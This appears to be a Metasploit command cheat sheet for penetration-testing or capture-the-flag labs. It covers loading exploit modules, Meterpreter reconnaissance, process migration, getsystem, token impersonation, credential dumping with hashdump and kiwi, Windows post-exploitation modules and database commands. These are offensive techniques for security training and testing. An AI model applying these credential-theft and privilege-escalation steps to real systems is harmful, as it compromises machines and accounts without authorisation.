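# Install exploit manually
cp -v <EXPLOIT> /usr/share/metasploit-framework/modules/exploits/
# OR from exploit-db
# (read third-party exploit code before loading it: a module runs inside the msfconsole process with its privileges)
pushd /usr/share/metasploit-framework/modules/exploits/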
searchsploit -m <EDB-ID>
# in MSF
reload
reload_all
### Search
# <type>/<os>/<service>/<name>
# Search for port and name, showing exploits only
search type:exploit platform: port:<PORT> name:<NAME>
# grep (filters command output; filters can be nested)
grep meterpreter grep reverse_tcp show payloads
# Set all LHOST to tunnel IP
setg LHOST tun0
📊 Meterpreter Survey
sysinfo
getuid
getpid
ipconfig
ps
# Linux flag search
search -d / -f flag.txt
search -d / -f user.txt
search -d / -f root.txt
# Windows flag search
search -d C:\\ -f flag.txt
search -d C:\\ -f user.txt
search -d C:\\ -f root.txt
# REMEMBER: on Windows, quote paths and use double backslashes
cat "C:\\Program Files (x86)\\"
# Migrate
ps -s | grep svchost
migrate <PID>
getsystem
getprivs
# List security tokens of user and group
list_tokens -u
list_tokens -g
impersonate_token <DOMAIN_NAME>\\<USERNAME>
steal_token <PID>
drop_token
# Dump creds
hashdump # CrackStation
lsa_dump_sam
lsa_dump_secrets
# Better dump creds
load kiwi
creds_all
# === WINDOWS ===
run winenum
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
# --- Privilege Escalation & Credential Gathering ---
run post/windows/gather/smart_hashdump
run post/multi/recon/local_exploit_suggester
🗄️ DB for Targets
# Check database status from within msfconsole
db_status
# Database Backend Commands
db_nmap <NMAP_OPTS> <TARGET>
db_connect
db_disconnect
db_export -f xml metasploit_backup.xml
db_import <SCAN_FILE_XML>
db_rebuild_cache
db_remove
db_save
# Manage workspaces
workspace
workspace -a <WORKSPACE>
workspace -d <WORKSPACE>
workspace <WORKSPACE>
hosts
loot
notes
services
vulns
creds
# Using database hosts for a module
hosts -R # set RHOSTS from hosts
services -S <SEARCH>